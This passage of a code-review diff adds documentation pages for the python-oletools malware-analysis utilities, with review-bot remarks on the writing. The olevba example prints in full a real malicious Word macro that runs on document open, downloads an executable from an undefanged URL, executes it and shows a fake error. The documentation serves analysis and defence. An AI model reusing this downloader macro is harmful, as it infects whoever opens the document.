  52 +Flash objects: 1</code></pre>
  53 +<h2 id="how-to-use-oleid-in-python-applications">How to use oleid in Python applications</h2>
  54 +<p>TODO</p>
  55 +<hr />
  56 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  57 +<ul>
  58 +<li><a href="Home.html">Home</a></li>
  59 +<li><a href="License.html">License</a></li>
  60 +<li><a href="Install.html">Install</a></li>
  61 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  62 +<li>Tools:
  63 +<ul>
  64 +<li><a href="olebrowse.html">olebrowse</a></li>
  65 +<li><a href="oleid.html">oleid</a></li>
  66 +<li><a href="olemeta.html">olemeta</a></li>
  67 +<li><a href="oletimes.html">oletimes</a></li>
  68 +<li><a href="olevba.html">olevba</a></li>
  69 +<li><a href="pyxswf.html">pyxswf</a></li>
  70 +<li><a href="rtfobj.html">rtfobj</a></li>
  71 +</ul></li>
  72 +</ul>
  73 +</body>
  74 +</html>
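Review bot: the "How to use oleid in Python applications" section (lines 53-54) consists only of "TODO", while the feature list on line 21 advertises a "Python API to integrate it in your applications". Either document the API here before shipping the page in the package, or remove the empty section and say in the feature list that the API is not yet documented.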
... ...
oletools/doc/oleid.md 0 → 100644
  1 +oleid
  2 +=====
  3 +
  4 +oleid is a script to analyze OLE files such as MS Office documents (e.g. Word,
  5 +Excel), to detect specific characteristics usually found in malicious files (e.g. malware).
  6 +For example it can detect VBA macros and embedded Flash objects.
  7 +
  8 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  9 +
  10 +## Main Features
  11 +
  12 +- Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)
  13 +- Detect VBA Macros
  14 +- Detect embedded Flash objects
  15 +- Detect embedded OLE objects
  16 +- Detect MS Office encryption
  17 +- Can be used as a command-line tool
  18 +- Python API to integrate it in your applications
  19 +
  20 +Planned improvements:
  21 +
  22 +- Extract the most important metadata fields
  23 +- Support for OpenXML files and embedded OLE files
  24 +- Generic VBA macros detection
  25 +- Detect auto-executable VBA macros
  26 +- Extended OLE file types detection
  27 +- Detect unusual OLE structures (fragmentation, unused sectors, etc)
  28 +- Options to scan multiple files
  29 +- Options to scan files from encrypted zip archives
  30 +- CSV output
  31 +
  32 +## Usage
  33 +
  34 + :::text
  35 + oleid.py <file>
  36 +
  37 +### Example
  38 +
  39 +Analyzing a Word document containing a Flash object and VBA macros:
  40 +
  41 + :::text
  42 + C:\oletools>oleid.py word_flash_vba.doc
  43 +
  44 + Filename: word_flash_vba.doc
  45 + OLE format: True
  46 + Has SummaryInformation stream: True
  47 + Application name: Microsoft Office Word
  48 + Encrypted: False
  49 + Word Document: True
  50 + VBA Macros: True
  51 + Excel Workbook: False
  52 + PowerPoint Presentation: False
  53 + Visio Drawing: False
  54 + ObjectPool: True
  55 + Flash objects: 1
  56 +
  57 +## How to use oleid in Python applications
  58 +
  59 +TODO
  60 +
  61 +--------------------------------------------------------------------------
  62 +
  63 +python-oletools documentation
  64 +-----------------------------
  65 +
  66 +- [[Home]]
  67 +- [[License]]
  68 +- [[Install]]
  69 +- [[Contribute]], Suggest Improvements or Report Issues
  70 +- Tools:
  71 + - [[olebrowse]]
  72 + - [[oleid]]
  73 + - [[olemeta]]
  74 + - [[oletimes]]
  75 + - [[olevba]]
  76 + - [[pyxswf]]
  77 + - [[rtfobj]]
0 78 \ No newline at end of file
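Review bot: Line 18 lists "Python API to integrate it in your applications" under Main Features, but the "How to use oleid in Python applications" section at line 59 is only "TODO". A reader who picks the tool for its API has nothing to go on. Either move the API item to "Planned improvements" until it is documented, or replace the TODO with at least the entry point to import and call.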
... ...
oletools/doc/olemeta.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="olemeta">olemeta</h1>
  11 +<p>olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<h2 id="usage">Usage</h2>
  14 +<pre><code>olemeta.py &lt;file&gt;</code></pre>
  15 +<h3 id="example">Example</h3>
  16 +<p>Checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
  17 +<pre><code>&gt;olemeta.py DIAN_caso-5415.doc
  18 +
  19 +Properties from SummaryInformation stream:
  20 +- codepage: 1252
  21 +- title: &#39;Gu\xeda MIPYME para ser emisor electr\xf3nico&#39;
  22 +- subject: &#39;&#39;
  23 +- author: &#39;OFEyDV&#39;
  24 +- keywords: &#39;&#39;
  25 +- comments: &#39;&#39;
  26 +- template: &#39;Normal.dotm&#39;
  27 +- last_saved_by: &#39;clein&#39;
  28 +- revision_number: &#39;13&#39;
  29 +- total_edit_time: 4800L
  30 +- last_printed: datetime.datetime(2006, 6, 7, 14, 4)
  31 +- create_time: datetime.datetime(2009, 3, 30, 14, 18)
  32 +- last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
  33 +- num_pages: 7
  34 +- num_words: 269
  35 +- num_chars: 1485
  36 +- thumbnail: None
  37 +- creating_application: &#39;Microsoft Office Word&#39;
  38 +- security: 0
  39 +
  40 +Properties from DocumentSummaryInformation stream:
  41 +- codepage_doc: 1252
  42 +- category: None
  43 +- presentation_target: None
  44 +- bytes: None
  45 +- lines: 12
  46 +- paragraphs: 3
  47 +- slides: None
  48 +- notes: None
  49 +- hidden_slides: None
  50 +- mm_clips: None
  51 +- scale_crop: False
  52 +- heading_pairs: None
  53 +- titles_of_parts: None
  54 +- manager: None
  55 +- company: &#39;Servicio de Impuestos Internos&#39;
  56 +- links_dirty: False
  57 +- chars_with_spaces: 1751
  58 +- unused: None
  59 +- shared_doc: False
  60 +- link_base: None
  61 +- hlinks: None
  62 +- hlinks_changed: False
  63 +- version: 786432
  64 +- dig_sig: None
  65 +- content_type: None
  66 +- content_status: None
  67 +- language: None
  68 +- doc_version: None</code></pre>
  69 +<h2 id="how-to-use-olemeta-in-python-applications">How to use olemeta in Python applications</h2>
  70 +<p>TODO</p>
  71 +<hr />
  72 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  73 +<ul>
  74 +<li><a href="Home.html">Home</a></li>
  75 +<li><a href="License.html">License</a></li>
  76 +<li><a href="Install.html">Install</a></li>
  77 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  78 +<li>Tools:
  79 +<ul>
  80 +<li><a href="olebrowse.html">olebrowse</a></li>
  81 +<li><a href="oleid.html">oleid</a></li>
  82 +<li><a href="olemeta.html">olemeta</a></li>
  83 +<li><a href="oletimes.html">oletimes</a></li>
  84 +<li><a href="olevba.html">olevba</a></li>
  85 +<li><a href="pyxswf.html">pyxswf</a></li>
  86 +<li><a href="rtfobj.html">rtfobj</a></li>
  87 +</ul></li>
  88 +</ul>
  89 +</body>
  90 +</html>
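Review bot: The `<title></title>` element on line 7 is empty, so the page shows up untitled in browser tabs, bookmarks and search results. Pass a title to pandoc when generating (for this page, "olemeta") so the generated head matches the `<h1>` on line 10.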
... ...
oletools/doc/olemeta.md 0 → 100644
  1 +olemeta
  2 +=======
  3 +
  4 +olemeta is a script to parse OLE files such as MS Office documents (e.g. Word,
  5 +Excel), to extract all standard properties present in the OLE file.
  6 +
  7 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  8 +
  9 +## Usage
  10 +
  11 + :::text
  12 + olemeta.py <file>
  13 +
  14 +### Example
  15 +
  16 +Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
  17 +
  18 + :::text
  19 + >olemeta.py DIAN_caso-5415.doc
  20 +
  21 + Properties from SummaryInformation stream:
  22 + - codepage: 1252
  23 + - title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico'
  24 + - subject: ''
  25 + - author: 'OFEyDV'
  26 + - keywords: ''
  27 + - comments: ''
  28 + - template: 'Normal.dotm'
  29 + - last_saved_by: 'clein'
  30 + - revision_number: '13'
  31 + - total_edit_time: 4800L
  32 + - last_printed: datetime.datetime(2006, 6, 7, 14, 4)
  33 + - create_time: datetime.datetime(2009, 3, 30, 14, 18)
  34 + - last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
  35 + - num_pages: 7
  36 + - num_words: 269
  37 + - num_chars: 1485
  38 + - thumbnail: None
  39 + - creating_application: 'Microsoft Office Word'
  40 + - security: 0
  41 +
  42 + Properties from DocumentSummaryInformation stream:
  43 + - codepage_doc: 1252
  44 + - category: None
  45 + - presentation_target: None
  46 + - bytes: None
  47 + - lines: 12
  48 + - paragraphs: 3
  49 + - slides: None
  50 + - notes: None
  51 + - hidden_slides: None
  52 + - mm_clips: None
  53 + - scale_crop: False
  54 + - heading_pairs: None
  55 + - titles_of_parts: None
  56 + - manager: None
  57 + - company: 'Servicio de Impuestos Internos'
  58 + - links_dirty: False
  59 + - chars_with_spaces: 1751
  60 + - unused: None
  61 + - shared_doc: False
  62 + - link_base: None
  63 + - hlinks: None
  64 + - hlinks_changed: False
  65 + - version: 786432
  66 + - dig_sig: None
  67 + - content_type: None
  68 + - content_status: None
  69 + - language: None
  70 + - doc_version: None
  71 +
  72 +## How to use olemeta in Python applications
  73 +
  74 +TODO
  75 +
  76 +--------------------------------------------------------------------------
  77 +
  78 +python-oletools documentation
  79 +-----------------------------
  80 +
  81 +- [[Home]]
  82 +- [[License]]
  83 +- [[Install]]
  84 +- [[Contribute]], Suggest Improvements or Report Issues
  85 +- Tools:
  86 + - [[olebrowse]]
  87 + - [[oleid]]
  88 + - [[olemeta]]
  89 + - [[oletimes]]
  90 + - [[olevba]]
  91 + - [[pyxswf]]
  92 + - [[rtfobj]]
0 93 \ No newline at end of file
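Review bot: The example output on lines 23 and 31 shows values as raw Python representations (`'Gu\xeda MIPYME para ser emisor electr\xf3nico'` and `4800L`) with no explanation. Add a sentence after the example saying that string properties are printed as undecoded bytes in the code page given by `codepage` (1252 here) and that the `L` suffix is a Python long integer, so readers do not mistake the escapes for corruption in the sample.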
... ...
oletools/doc/oletimes.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="oletimes">oletimes</h1>
  11 +<p>oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<h2 id="usage">Usage</h2>
  14 +<pre><code>oletimes.py &lt;file&gt;</code></pre>
  15 +<h3 id="example">Example</h3>
  16 +<p>Checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
  17 +<pre><code>&gt;oletimes.py DIAN_caso-5415.doc
  18 +
  19 +- Root mtime=2014-05-14 12:45:24.752000 ctime=None
  20 +- &#39;\x01CompObj&#39;: mtime=None ctime=None
  21 +- &#39;\x05DocumentSummaryInformation&#39;: mtime=None ctime=None
  22 +- &#39;\x05SummaryInformation&#39;: mtime=None ctime=None
  23 +- &#39;1Table&#39;: mtime=None ctime=None
  24 +- &#39;Data&#39;: mtime=None ctime=None
  25 +- &#39;Macros&#39;: mtime=2014-05-14 12:45:24.708000 ctime=2014-05-14 12:45:24.355000
  26 +- &#39;Macros/PROJECT&#39;: mtime=None ctime=None
  27 +- &#39;Macros/PROJECTwm&#39;: mtime=None ctime=None
  28 +- &#39;Macros/VBA&#39;: mtime=2014-05-14 12:45:24.684000 ctime=2014-05-14 12:45:24.355000
  29 +- &#39;Macros/VBA/ThisDocument&#39;: mtime=None ctime=None
  30 +- &#39;Macros/VBA/_VBA_PROJECT&#39;: mtime=None ctime=None
  31 +- &#39;Macros/VBA/__SRP_0&#39;: mtime=None ctime=None
  32 +- &#39;Macros/VBA/__SRP_1&#39;: mtime=None ctime=None
  33 +- &#39;Macros/VBA/__SRP_2&#39;: mtime=None ctime=None
  34 +- &#39;Macros/VBA/__SRP_3&#39;: mtime=None ctime=None
  35 +- &#39;Macros/VBA/dir&#39;: mtime=None ctime=None
  36 +- &#39;WordDocument&#39;: mtime=None ctime=None</code></pre>
  37 +<h2 id="how-to-use-oletimes-in-python-applications">How to use oletimes in Python applications</h2>
  38 +<p>TODO</p>
  39 +<hr />
  40 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  41 +<ul>
  42 +<li><a href="Home.html">Home</a></li>
  43 +<li><a href="License.html">License</a></li>
  44 +<li><a href="Install.html">Install</a></li>
  45 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  46 +<li>Tools:
  47 +<ul>
  48 +<li><a href="olebrowse.html">olebrowse</a></li>
  49 +<li><a href="oleid.html">oleid</a></li>
  50 +<li><a href="olemeta.html">olemeta</a></li>
  51 +<li><a href="oletimes.html">oletimes</a></li>
  52 +<li><a href="olevba.html">olevba</a></li>
  53 +<li><a href="pyxswf.html">pyxswf</a></li>
  54 +<li><a href="rtfobj.html">rtfobj</a></li>
  55 +</ul></li>
  56 +</ul>
  57 +</body>
  58 +</html>
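Review bot: In the example on lines 19 to 36, only Root, 'Macros' and 'Macros/VBA' carry any timestamp, and every other entry shows `mtime=None ctime=None`, but the text never says what `None` means or which time zone the printed values are in. Anyone using this output to build a timeline needs both facts. Add a short note under the example stating when a timestamp is reported as `None` and whether the times are UTC or local.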
... ...
oletools/doc/oletimes.md 0 → 100644
  1 +oletimes
  2 +========
  3 +
  4 +oletimes is a script to parse OLE files such as MS Office documents (e.g. Word,
  5 +Excel), to extract creation and modification times of all streams and storages
  6 +in the OLE file.
  7 +
  8 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  9 +
  10 +## Usage
  11 +
  12 + :::text
  13 + oletimes.py <file>
  14 +
  15 +### Example
  16 +
  17 +Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
  18 +
  19 + :::text
  20 + >oletimes.py DIAN_caso-5415.doc
  21 +
  22 + - Root mtime=2014-05-14 12:45:24.752000 ctime=None
  23 + - '\x01CompObj': mtime=None ctime=None
  24 + - '\x05DocumentSummaryInformation': mtime=None ctime=None
  25 + - '\x05SummaryInformation': mtime=None ctime=None
  26 + - '1Table': mtime=None ctime=None
  27 + - 'Data': mtime=None ctime=None
  28 + - 'Macros': mtime=2014-05-14 12:45:24.708000 ctime=2014-05-14 12:45:24.355000
  29 + - 'Macros/PROJECT': mtime=None ctime=None
  30 + - 'Macros/PROJECTwm': mtime=None ctime=None
  31 + - 'Macros/VBA': mtime=2014-05-14 12:45:24.684000 ctime=2014-05-14 12:45:24.355000
  32 + - 'Macros/VBA/ThisDocument': mtime=None ctime=None
  33 + - 'Macros/VBA/_VBA_PROJECT': mtime=None ctime=None
  34 + - 'Macros/VBA/__SRP_0': mtime=None ctime=None
  35 + - 'Macros/VBA/__SRP_1': mtime=None ctime=None
  36 + - 'Macros/VBA/__SRP_2': mtime=None ctime=None
  37 + - 'Macros/VBA/__SRP_3': mtime=None ctime=None
  38 + - 'Macros/VBA/dir': mtime=None ctime=None
  39 + - 'WordDocument': mtime=None ctime=None
  40 +
  41 +## How to use oletimes in Python applications
  42 +
  43 +TODO
  44 +
  45 +--------------------------------------------------------------------------
  46 +
  47 +python-oletools documentation
  48 +-----------------------------
  49 +
  50 +- [[Home]]
  51 +- [[License]]
  52 +- [[Install]]
  53 +- [[Contribute]], Suggest Improvements or Report Issues
  54 +- Tools:
  55 + - [[olebrowse]]
  56 + - [[oleid]]
  57 + - [[olemeta]]
  58 + - [[oletimes]]
  59 + - [[olevba]]
  60 + - [[pyxswf]]
  61 + - [[rtfobj]]
0 62 \ No newline at end of file
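Review bot: The footer links on lines 50 to 61 use the wiki's `[[Home]]` form, and the code blocks are introduced with `:::text` (lines 12 and 19). Both depend on the wiki renderer. Read as a plain Markdown file from the doc folder, the links will not resolve and the markers will appear as literal text. If these .md files are meant to be read outside the wiki, convert the links to relative ones such as `[Home](Home.md)`, or state in the doc folder that the .html files are the readable copies.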
... ...
oletools/doc/olevba.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="olevba">olevba</h1>
  11 +<p>olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to extract VBA Macro code in clear text.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<p>Supported formats:</p>
  14 +<ul>
  15 +<li>Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)</li>
  16 +<li>Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)</li>
  17 +<li>PowerPoint 2007+ (.pptm, .ppsm)</li>
  18 +</ul>
  19 +<p>olevba is based on source code from <a href="https://github.com/unixfreak0037/officeparser">officeparser</a> by John William Davison</p>
  20 +<h2 id="usage">Usage</h2>
  21 +<pre><code>olevba.py &lt;file&gt;</code></pre>
  22 +<h3 id="example">Example</h3>
  23 +<p>Checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
  24 +<pre><code>&gt;olevba.py DIAN_caso-5415.doc
  25 +
  26 +INFO: Extracting VBA Macros from OLE file DIAN_caso-5415.doc
  27 +
  28 +-------------------------------------------------------------------------------
  29 +ThisDocument.cls
  30 +
  31 +Attribute VB_Name = &quot;ThisDocument&quot;
  32 +Attribute VB_Base = &quot;1Normal.ThisDocument&quot;
  33 +Attribute VB_GlobalNameSpace = False
  34 +Attribute VB_Creatable = False
  35 +Attribute VB_PredeclaredId = True
  36 +Attribute VB_Exposed = True
  37 +Attribute VB_TemplateDerived = True
  38 +Attribute VB_Customizable = True
  39 +Option Explicit
  40 +Private Declare Function URLDownloadToFileA Lib &quot;urlmon&quot; (ByVal FVQGKS As Long, _
  41 +ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
  42 +ByVal HQTLDG As Long) As Long
  43 +Sub AutoOpen()
  44 + Auto_Open
  45 +End Sub
  46 +Sub Auto_Open()
  47 +SNVJYQ
  48 +End Sub
  49 +Public Sub SNVJYQ()
  50 + OGEXYR &quot;http://germanya.com.ec/logs/test.exe&quot;, Environ(&quot;TMP&quot;) &amp; &quot;\sfjozjero.exe&quot;
  51 +End Sub
  52 +Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
  53 + Dim HRKUYU, lala As Long
  54 + HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
  55 + If HRKUYU = 0 Then OGEXYR = True
  56 + Dim YKPZZS
  57 + YKPZZS = Shell(PHHWIV, 1)
  58 + MsgBox &quot;El contenido de este documento no es compatible con este equipo.&quot; &amp; vbCrLf &amp; vbCrLf &amp; &quot;Por favor intente desde otro equipo.&quot;, vbCritical, &quot;Equipo no compatible&quot;
  59 + lala = URLDownloadToFileA(0, &quot;http://germanya.com.ec/logs/counter.php&quot;, Environ(&quot;TMP&quot;) &amp; &quot;\lkjljlljk&quot;, 0, 0)
  60 + Application.DisplayAlerts = False
  61 + Application.Quit
  62 +End Function
  63 +Sub Workbook_Open()
  64 + Auto_Open
  65 +End Sub</code></pre>
  66 +<h2 id="how-to-use-olevba-in-python-applications">How to use olevba in Python applications</h2>
  67 +<p>TODO</p>
  68 +<hr />
  69 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  70 +<ul>
  71 +<li><a href="Home.html">Home</a></li>
  72 +<li><a href="License.html">License</a></li>
  73 +<li><a href="Install.html">Install</a></li>
  74 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  75 +<li>Tools:
  76 +<ul>
  77 +<li><a href="olebrowse.html">olebrowse</a></li>
  78 +<li><a href="oleid.html">oleid</a></li>
  79 +<li><a href="olemeta.html">olemeta</a></li>
  80 +<li><a href="oletimes.html">oletimes</a></li>
  81 +<li><a href="olevba.html">olevba</a></li>
  82 +<li><a href="pyxswf.html">pyxswf</a></li>
  83 +<li><a href="rtfobj.html">rtfobj</a></li>
  84 +</ul></li>
  85 +</ul>
  86 +</body>
  87 +</html>
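Review bot: Lines 50 and 59 of the example reproduce the sample's download URLs in directly usable form. Documentation pages are copied, indexed and scanned, so live-looking malware URLs tend to trigger mail and proxy filters and invite accidental visits. Defang them in the example (for instance `hxxp://` with `[.]` in the host name) and say in the sentence above the block that the URLs were altered for display.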
... ...
oletools/doc/olevba.md 0 → 100644
  1 +olevba
  2 +======
  3 +
  4 +olevba is a script to parse OLE and OpenXML files such as MS Office documents
  5 +(e.g. Word, Excel), to extract VBA Macro code in clear text.
  6 +
  7 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  8 +
  9 +Supported formats:
  10 +
  11 +- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
  12 +- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
  13 +- PowerPoint 2007+ (.pptm, .ppsm)
  14 +
  15 +olevba is based on source code from [officeparser](https://github.com/unixfreak0037/officeparser) by John William Davison
  16 +
  17 +## Usage
  18 +
  19 + :::text
  20 + olevba.py <file>
  21 +
  22 +### Example
  23 +
  24 +Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
  25 +
  26 + :::text
  27 + >olevba.py DIAN_caso-5415.doc
  28 +
  29 + INFO: Extracting VBA Macros from OLE file DIAN_caso-5415.doc
  30 +
  31 + -------------------------------------------------------------------------------
  32 + ThisDocument.cls
  33 +
  34 + Attribute VB_Name = "ThisDocument"
  35 + Attribute VB_Base = "1Normal.ThisDocument"
  36 + Attribute VB_GlobalNameSpace = False
  37 + Attribute VB_Creatable = False
  38 + Attribute VB_PredeclaredId = True
  39 + Attribute VB_Exposed = True
  40 + Attribute VB_TemplateDerived = True
  41 + Attribute VB_Customizable = True
  42 + Option Explicit
  43 + Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long, _
  44 + ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
  45 + ByVal HQTLDG As Long) As Long
  46 + Sub AutoOpen()
  47 + Auto_Open
  48 + End Sub
  49 + Sub Auto_Open()
  50 + SNVJYQ
  51 + End Sub
  52 + Public Sub SNVJYQ()
  53 + OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.exe"
  54 + End Sub
  55 + Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
  56 + Dim HRKUYU, lala As Long
  57 + HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
  58 + If HRKUYU = 0 Then OGEXYR = True
  59 + Dim YKPZZS
  60 + YKPZZS = Shell(PHHWIV, 1)
  61 + MsgBox "El contenido de este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no compatible"
  62 + lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Environ("TMP") & "\lkjljlljk", 0, 0)
  63 + Application.DisplayAlerts = False
  64 + Application.Quit
  65 + End Function
  66 + Sub Workbook_Open()
  67 + Auto_Open
  68 + End Sub
  69 +
  70 +## How to use olevba in Python applications
  71 +
  72 +TODO
  73 +
  74 +--------------------------------------------------------------------------
  75 +
  76 +python-oletools documentation
  77 +-----------------------------
  78 +
  79 +- [[Home]]
  80 +- [[License]]
  81 +- [[Install]]
  82 +- [[Contribute]], Suggest Improvements or Report Issues
  83 +- Tools:
  84 + - [[olebrowse]]
  85 + - [[oleid]]
  86 + - [[olemeta]]
  87 + - [[oletimes]]
  88 + - [[olevba]]
  89 + - [[pyxswf]]
  90 + - [[rtfobj]]
0 91 \ No newline at end of file
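Review bot: The example on lines 26 to 68 dumps the whole macro but never tells the reader what to take from it. One or two sentences after the block would make it useful for triage: point at the auto-run entry points (`AutoOpen`, `Auto_Open`, `Workbook_Open`), the `URLDownloadToFileA` declaration and calls, and the `Shell` call on line 60 as the parts that show this macro downloads a file and runs it. Separately, the attribution sentence on line 15 is missing its final period.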
... ...
oletools/doc/pyxswf.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="pyxswf">pyxswf</h1>
  11 +<p>pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<p>pyxswf is an extension to <a href="http://hooked-on-mnemonics.blogspot.nl/2011/12/xxxswfpy.html">xxxswf.py</a> published by Alexander Hanel.</p>
  14 +<p>Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on <a href="http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/">http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/</a></p>
  15 +<p>It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).</p>
  16 +<p>For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.</p>
  17 +<h2 id="usage">Usage</h2>
  18 +<pre><code>Usage: pyxswf.py [options] &lt;file.bad&gt;
  19 +
  20 +Options:
  21 + -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
  22 + in each stream
  23 + -f, --rtf Parse an RTF file to look for SWF in each embedded
  24 + object
  25 + -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf &amp;
  26 + saves it in the working dir. No addition args needed
  27 + -h, --help show this help message and exit
  28 + -y, --yara Scans the SWF(s) with yara. If the SWF(s) is
  29 + compressed it will be deflated. No addition args
  30 + needed
  31 + -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func
  32 + checkMD5 to define hashes. No addition args needed
  33 + -H, --header Displays the SWFs file header. No addition args needed
  34 + -d, --decompress Deflates compressed SWFS(s)
  35 + -r PATH, --recdir=PATH
  36 + Will recursively scan a directory for files that
  37 + contain SWFs. Must provide path in quotes
  38 + -c, --compress Compresses the SWF using Zlib</code></pre>
  39 +<h3 id="example-1---detecting-and-extracting-a-swf-file-from-a-word-document-on-windows">Example 1 - detecting and extracting a SWF file from a Word document on Windows:</h3>
  40 +<pre><code>C:\oletools&gt;pyxswf.py -o word_flash.doc
  41 +OLE stream: &#39;Contents&#39;
  42 +[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
  43 + [ADDR] SWF 1 at 0x8 - FWS Header
  44 +
  45 +C:\oletools&gt;pyxswf.py -xo word_flash.doc
  46 +OLE stream: &#39;Contents&#39;
  47 +[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
  48 + [ADDR] SWF 1 at 0x8 - FWS Header
  49 + [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf</code></pre>
  50 +<h3 id="example-2---detecting-and-extracting-a-swf-file-from-a-rtf-document-on-windows">Example 2 - detecting and extracting a SWF file from a RTF document on Windows:</h3>
  51 +<pre><code>C:\oletools&gt;pyxswf.py -xf &quot;rtf_flash.rtf&quot;
  52 +RTF embedded object size 1498557 at index 000036DD
  53 +[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
  54 +00036DD
  55 + [ADDR] SWF 1 at 0xc40 - FWS Header
  56 + [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf</code></pre>
  57 +<h2 id="how-to-use-pyxswf-in-python-applications">How to use pyxswf in Python applications</h2>
  58 +<p>TODO</p>
  59 +<hr />
  60 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  61 +<ul>
